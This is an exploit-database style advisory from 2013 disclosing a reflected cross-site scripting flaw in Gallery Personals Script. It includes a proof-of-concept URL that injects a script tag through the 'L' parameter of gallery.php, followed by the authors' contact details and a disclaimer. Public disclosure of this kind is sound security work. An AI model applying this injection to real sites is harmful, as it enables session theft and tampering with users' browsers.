# Exploit Title: Gallery Personals Script Remote XSS Vulnerability
# Date: 26/02/2013
# Author: The Black Devils
# Software Link: http://scriptsgenie.com/
# Demo : http://resalemembership.com/demos/pgallery/
# Category : [ webapps ]
# Dork : [ n / a ]
# Type : php
# Tested on: [Windows]
Tested on: Microsoft Windows Sp2
Apache 2.4.2 (Win32)
PHP 5.4.4
MySQL 5.5.25a
This vulnerability was discovered and researched by The Black Devils
[~] XSS Injection on Demo Site (/gallery.php?L=)
>>> http://server/pgallery/gallery.php?L='"><script>alert(1337);</script>'
-----------
Contact:
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information